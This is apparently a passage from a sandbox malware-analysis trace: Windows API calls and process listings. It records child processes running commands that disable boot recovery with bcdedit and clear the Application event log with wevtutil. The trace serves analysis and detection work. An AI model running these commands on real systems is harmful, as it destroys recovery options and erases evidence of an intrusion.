SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0042.230] GetProcessHeap () returned 0x360000 [0042.230] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x378b50 | out: hHeap=0x360000) returned 1 [0042.230] GetEnvironmentStringsW () returned 0x37c100* [0042.230] GetProcessHeap () returned 0x360000 [0042.230] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xb0e) returned 0x378b50 [0042.230] FreeEnvironmentStringsW (penv=0x37c100) returned 1 [0042.230] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0042.230] GetProcessHeap () returned 0x360000 [0042.230] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x378b50 | out: hHeap=0x360000) returned 1 [0042.230] GetEnvironmentStringsW () returned 0x37c100* [0042.230] GetProcessHeap () returned 0x360000 [0042.230] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xb0e) returned 0x378b50 [0042.230] FreeEnvironmentStringsW (penv=0x37c100) returned 1 [0042.230] GetProcessHeap () returned 0x360000 [0042.230] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3789b0 | out: hHeap=0x360000) returned 1 [0042.230] DeleteProcThreadAttributeList (in: lpAttributeList=0x18ed98 | out: lpAttributeList=0x18ed98) [0042.230] _get_osfhandle (_FileHandle=1) returned 0x7 [0042.230] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0042.230] _get_osfhandle (_FileHandle=1) returned 0x7 [0042.230] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1 [0042.231] _get_osfhandle (_FileHandle=0) returned 0x3 [0042.231] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1 [0042.231] SetConsoleInputExeNameW () returned 0x1 [0042.231] GetConsoleOutputCP () returned 0x1b5 [0042.231] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1 [0042.231] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0042.231] exit (_Code=0) Process: id = "8" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x49a0e000" os_pid = "0xb94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xb2c" cmd_line = "Bcdedit.exe /set {default} recoveryenabled no" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 23 os_tid = 0xb98 Process: id = "9" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x49408000" os_pid = "0xbac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xb78" cmd_line = "Bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 24 os_tid = 0xbb0 Process: id = "10" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x49071000" os_pid = "0xb80" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0xb34" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0007ab1a" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 26 os_tid = 0xbbc Thread: id = 27 os_tid = 0xbb4 Thread: id = 28 os_tid = 0xba8 [0043.235] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xe8d8c0 | out: lpSystemTimeAsFileTime=0xe8d8c0*(dwLowDateTime=0x2cc82800, dwHighDateTime=0x18d1aee)) [0043.235] GetCurrentProcessId () returned 0xb80 [0043.235] GetCurrentThreadId () returned 0xba8 [0043.235] GetTickCount () returned 0x1a3ec [0043.235] QueryPerformanceCounter (in: lpPerformanceCount=0xe8d8c8 | out: lpPerformanceCount=0xe8d8c8*=16350393423) returned 1 [0043.235] malloc (_Size=0x100) returned 0xd8e80 [0101.873] free (_Block=0xd8e80) Thread: id = 29 os_tid = 0xba4 Thread: id = 30 os_tid = 0xb9c Thread: id = 31 os_tid = 0xb84 Thread: id = 32 os_tid = 0xbc0 Thread: id = 51 os_tid = 0xbe8 Thread: id = 139 os_tid = 0x83c Thread: id = 222 os_tid = 0xd0 Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x15f04000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "10" os_parent_pid = "0xb80" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dc17" [0xc000000f], "LOCAL" [0x7] Thread: id = 33 os_tid = 0xacc Thread: id = 34 os_tid = 0x128 Thread: id = 35 os_tid = 0x76c Thread: id = 36 os_tid = 0x758 Thread: id = 37 os_tid = 0x74c Thread: id = 38 os_tid = 0x72c Thread: id = 39 os_tid = 0x71c Thread: id = 40 os_tid = 0x718 Thread: id = 41 os_tid = 0x638 Thread: id = 42 os_tid = 0x154 Thread: id = 43 os_tid = 0x150 Thread: id = 44 os_tid = 0x12c Thread: id = 45 os_tid = 0x120 Thread: id = 46 os_tid = 0x3fc Thread: id = 163 os_tid = 0x900 Thread: id = 166 os_tid = 0x8fc Thread: id = 219 os_tid = 0x850 Thread: id = 228 os_tid = 0xb10 Process: id = "12" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x230f4000" os_pid = "0x36c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0xb50" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 52 os_tid = 0x8ac Thread: id = 53 os_tid = 0x640 Thread: id = 54 os_tid = 0x330 Thread: id = 55 os_tid = 0x7f8 Thread: id = 56 os_tid = 0x430 Thread: id = 57 os_tid = 0x268 Thread: id = 58 os_tid = 0x768 Thread: id = 59 os_tid = 0x764 Thread: id = 60 os_tid = 0x760 Thread: id = 61 os_tid = 0x75c Thread: id = 62 os_tid = 0x70c Thread: id = 63 os_tid = 0x6e8 Thread: id = 64 os_tid = 0x6d8 Thread: id = 65 os_tid = 0x6d4 Thread: id = 66 os_tid = 0x6c8 Thread: id = 67 os_tid = 0x6c0 Thread: id = 68 os_tid = 0x6b8 Thread: id = 69 os_tid = 0x6a4 Thread: id = 70 os_tid = 0x6a0 Thread: id = 71 os_tid = 0x690 Thread: id = 72 os_tid = 0x67c Thread: id = 73 os_tid = 0x490 Thread: id = 74 os_tid = 0x454 Thread: id = 75 os_tid = 0x450 Thread: id = 76 os_tid = 0x428 Thread: id = 77 os_tid = 0x424 Thread: id = 78 os_tid = 0x420 Thread: id = 79 os_tid = 0x404 Thread: id = 80 os_tid = 0x18c Thread: id = 81 os_tid = 0xf0 Thread: id = 82 os_tid = 0xc8 Thread: id = 83 os_tid = 0x3f0 Thread: id = 84 os_tid = 0x3e4 Thread: id = 85 os_tid = 0x398 Thread: id = 86 os_tid = 0x394 Thread: id = 87 os_tid = 0x390 Thread: id = 88 os_tid = 0x38c Thread: id = 89 os_tid = 0x378 Thread: id = 90 os_tid = 0x370 Thread: id = 105 os_tid = 0xbf4 Thread: id = 106 os_tid = 0xbf8 Thread: id = 117 os_tid = 0x8ec Thread: id = 118 os_tid = 0x8e8 Thread: id = 119 os_tid = 0x8f0 Thread: id = 120 os_tid = 0x774 Thread: id = 121 os_tid = 0x3b0 Thread: id = 122 os_tid = 0x210 Thread: id = 123 os_tid = 0x734 Thread: id = 124 os_tid = 0x39c Thread: id = 125 os_tid = 0x7d0 Thread: id = 126 os_tid = 0x73c Thread: id = 127 os_tid = 0x924 Thread: id = 128 os_tid = 0x8e4 Thread: id = 129 os_tid = 0x53c Thread: id = 130 os_tid = 0x8e0 Thread: id = 131 os_tid = 0x8dc Thread: id = 132 os_tid = 0x8d8 Thread: id = 135 os_tid = 0x3c0 Thread: id = 136 os_tid = 0x5a4 Thread: id = 142 os_tid = 0x790 Thread: id = 143 os_tid = 0x7ec Thread: id = 144 os_tid = 0x5b8 Thread: id = 145 os_tid = 0x488 Thread: id = 146 os_tid = 0x694 Thread: id = 147 os_tid = 0x780 Thread: id = 162 os_tid = 0x8a0 Thread: id = 164 os_tid = 0x8cc Thread: id = 165 os_tid = 0x8f4 Thread: id = 209 os_tid = 0x774 Thread: id = 210 os_tid = 0x8e8 Thread: id = 211 os_tid = 0x210 Thread: id = 212 os_tid = 0x8e0 Thread: id = 213 os_tid = 0x8f0 Thread: id = 214 os_tid = 0x8e4 Thread: id = 216 os_tid = 0x39c Thread: id = 217 os_tid = 0xbf4 Process: id = "13" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x63707000" os_pid = "0x5b4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e990" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 91 os_tid = 0x814 Thread: id = 92 os_tid = 0x810 Thread: id = 93 os_tid = 0x80c Thread: id = 94 os_tid = 0x808 Thread: id = 95 os_tid = 0x804 Thread: id = 96 os_tid = 0x7cc Thread: id = 97 os_tid = 0x6b4 Thread: id = 98 os_tid = 0x6a8 Thread: id = 134 os_tid = 0x580 Thread: id = 221 os_tid = 0xcc Thread: id = 230 os_tid = 0x888 Process: id = "14" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x49276000" os_pid = "0xbc4" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "10" os_parent_pid = "0xb80" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0007b643" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 99 os_tid = 0xbf0 Thread: id = 100 os_tid = 0xbec Thread: id = 101 os_tid = 0xbd8 Thread: id = 102 os_tid = 0xbd4 Thread: id = 103 os_tid = 0xbcc Thread: id = 104 os_tid = 0xbc8 Thread: id = 223 os_tid = 0xd4 Process: id = "15" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x4801a000" os_pid = "0x738" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0007c311" [0xc000000f] Thread: id = 107 os_tid = 0x534 Thread: id = 108 os_tid = 0x41c Thread: id = 109 os_tid = 0x570 Thread: id = 110 os_tid = 0x588 Thread: id = 111 os_tid = 0x55c Thread: id = 112 os_tid = 0x61c Thread: id = 113 os_tid = 0x2b4 Thread: id = 133 os_tid = 0x928 Thread: id = 140 os_tid = 0x82c Thread: id = 215 os_tid = 0x73c Thread: id = 224 os_tid = 0xd8 Thread: id = 229 os_tid = 0x920 Process: id = "16" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x794fe000" os_pid = "0x964" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa44" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" cmd.exe /C wevtutil.exe cl Application" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 149 os_tid = 0x970 [0089.515] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fd00 | out: lpSystemTimeAsFileTime=0x14fd00*(dwLowDateTime=0x480dc8e0, dwHighDateTime=0x18d1aee)) [0089.515] GetCurrentProcessId () returned 0x964 [0089.515] GetCurrentThreadId () returned 0x970 [0089.515] GetTickCount () returned 0x256a7 [0089.515] QueryPerformanceCounter (in: lpPerformanceCount=0x14fd08 | out: lpPerformanceCount=0x14fd08*=20978423659) returned 1 [0089.516] GetModuleHandleW (lpModuleName=0x0) returned 0x4a220000 [0089.516] __set_app_type (_Type=0x1) [0089.516] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a247810) returned 0x0 [0089.517] __getmainargs (in: _Argc=0x4a26a608, _Argv=0x4a26a618, _Env=0x4a26a610, _DoWildCard=0, _StartInfo=0x4a24e0f4 | out: _Argc=0x4a26a608, _Argv=0x4a26a618, _Env=0x4a26a610) returned 0 [0089.517] GetCurrentThreadId () returned 0x970 [0089.517] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x970) returned 0x3c [0089.517] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0089.517] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0089.517] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0089.517] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0089.517] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fc98 | out: phkResult=0x14fc98*=0x0) returned 0x2 [0089.518] VirtualQuery (in: lpAddress=0x14fc80, lpBuffer=0x14fc00, dwLength=0x30 | out: lpBuffer=0x14fc00*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0089.518] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14fc00, dwLength=0x30 | out: lpBuffer=0x14fc00*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0089.518] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14fc00, dwLength=0x30 | out: lpBuffer=0x14fc00*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0089.518] VirtualQuery (in: lpAddress=0x54000, lpBuffer=0x14fc00, dwLength=0x30 | out: lpBuffer=0x14fc00*(BaseAddress=0x54000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0089.518] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14fc00, dwLength=0x30 | out: lpBuffer=0x14fc00*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0089.518] GetConsoleOutputCP () returned 0x1b5 [0089.518] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a25bfe0 | out: lpCPInfo=0x4a25bfe0) returned 1 [0089.518] SetConsoleCtrlHandler (HandlerRoutine=0x4a243184, Add=1) returned 1 [0089.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0089.518] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0089.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0089.518] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a24e194 | out: lpMode=0x4a24e194) returned 1 [0089.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0089.519] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0089.519] _get_osfhandle (_FileHandle=0) returned 0x3 [0089.519] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a24e198 | out: lpMode=0x4a24e198) returned 1 [0089.519] _get_osfhandle (_FileHandle=0) returned 0x3 [0089.519] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0089.519] GetEnvironmentStringsW () returned 0x31aa00* [0089.519] GetProcessHeap () returned 0x300000 [0089.519] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xa7c) returned 0x31b490 [0089.519] FreeEnvironmentStringsW (penv=0x31aa00) returned 1 [0089.519] GetProcessHeap () returned 0x300000 [0089.520] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x8) returned 0x318340 [0089.520] GetEnvironmentStringsW () returned 0x31aa00* [0089.520] GetProcessHeap () returned 0x300000 [0089.520] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xa7c) returned 0x31bf20 [0089.520] FreeEnvironmentStringsW (penv=0x31aa00) returned 1 [0089.520] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14eb58 | out: phkResult=0x14eb58*=0x44) returned 0x0 [0089.520] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14eb50, lpData=0x14eb70, lpcbData=0x14eb54*=0x1000 | out: lpType=0x14eb50*=0x0, lpData=0x14eb70*=0x18, lpcbData=0x14eb54*=0x1000) returned 0x2 [0089.520] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14eb50, lpData=0x14eb70, lpcbData=0x14eb54*=0x1000 | out: lpType=0x14eb50*=0x4, lpData=0x14eb70*=0x1, lpcbData=0x14eb54*=0x4) returned 0x0 [0089.520] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14eb50, lpData=0x14eb70, lpcbData=0x14eb54*=0x1000 | out: lpType=0x14eb50*=0x0, lpData=0x14eb70*=0x1, lpcbData=0x14eb54*=0x1000) returned 0x2 [0089.520] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14eb50, lpData=0x14eb70, lpcbData=0x14eb54*=0x1000 | out: lpType=0x14eb50*=0x4, lpData=0x14eb70*=0x0, lpcbData=0x14eb54*=0x4) returned 0x0 [0089.520] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14eb50, lpData=0x14eb70, lpcbData=0x14eb54*=0x1000 | out: lpType=0x14eb50*=0x4, lpData=0x14eb70*=0x40, lpcbData=0x14eb54*=0x4) returned 0x0 [0089.520] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14eb50, lpData=0x14eb70, lpcbData=0x14eb54*=0x1000 | out: lpType=0x14eb50*=0x4, lpData=0x14eb70*=0x40, lpcbData=0x14eb54*=0x4) returned 0x0 [0089.520] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14eb50, lpData=0x14eb70, lpcbData=0x14eb54*=0x1000 | out: lpType=0x14eb50*=0x0, lpData=0x14eb70*=0x40, lpcbData=0x14eb54*=0x1000) returned 0x2 [0089.520] RegCloseKey (hKey=0x44) returned 0x0 [0089.520] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14eb58 | out: phkResult=0x14eb58*=0x44) returned 0x0 [0089.520] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14eb50, lpData=0x14eb70, lpcbData=0x14eb54*=0x1000 | out: lpType=0x14eb50*=0x0, lpData=0x14eb70*=0x40, lpcbData=0x14eb54*=0x1000) returned 0x2 [0089.520] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14eb50, lpData=0x14eb70, lpcbData=0x14eb54*=0x1000 | out: lpType=0x14eb50*=0x4, lpData=0x14eb70*=0x1, lpcbData=0x14eb54*=0x4) returned 0x0 [0089.520] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14eb50, lpData=0x14eb70, lpcbData=0x14eb54*=0x1000 | out: lpType=0x14eb50*=0x0, lpData=0x14eb70*=0x1, lpcbData=0x14eb54*=0x1000) returned 0x2 [0089.520] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14eb50, lpData=0x14eb70, lpcbData=0x14eb54*=0x1000 | out: lpType=0x14eb50*=0x4, lpData=0x14eb70*=0x0, lpcbData=0x14eb54*=0x4) returned 0x0 [0089.520] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14eb50, lpData=0x14eb70, lpcbData=0x14eb54*=0x1000 | out: lpType=0x14eb50*=0x4, lpData=0x14eb70*=0x9, lpcbData=0x14eb54*=0x4) returned 0x0 [0089.521] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14eb50, lpData=0x14eb70, lpcbData=0x14eb54*=0x1000 | out: lpType=0x14eb50*=0x4, lpData=0x14eb70*=0x9, lpcbData=0x14eb54*=0x4) returned 0x0 [0089.521] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14eb50, lpData=0x14eb70, lpcbData=0x14eb54*=0x1000 | out: lpType=0x14eb50*=0x0, lpData=0x14eb70*=0x9, lpcbData=0x14eb54*=0x1000) returned 0x2 [0089.521] RegCloseKey (hKey=0x44) returned 0x0 [0089.521] time (in: timer=0x0 | out: timer=0x0) returned 0x1ad63547d19 [0089.521] srand (_Seed=0x63547d19) [0089.521] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" cmd.exe /C wevtutil.exe cl Application" [0089.521] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" cmd.exe /C wevtutil.exe cl Application" [0089.521] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a25c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0089.521] GetProcessHeap () returned 0x300000 [0089.521] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x218) returned 0x31c9b0 [0089.521] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x31c9c0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0089.521] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0089.521] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a24f360, nSize=0x2000 | out: 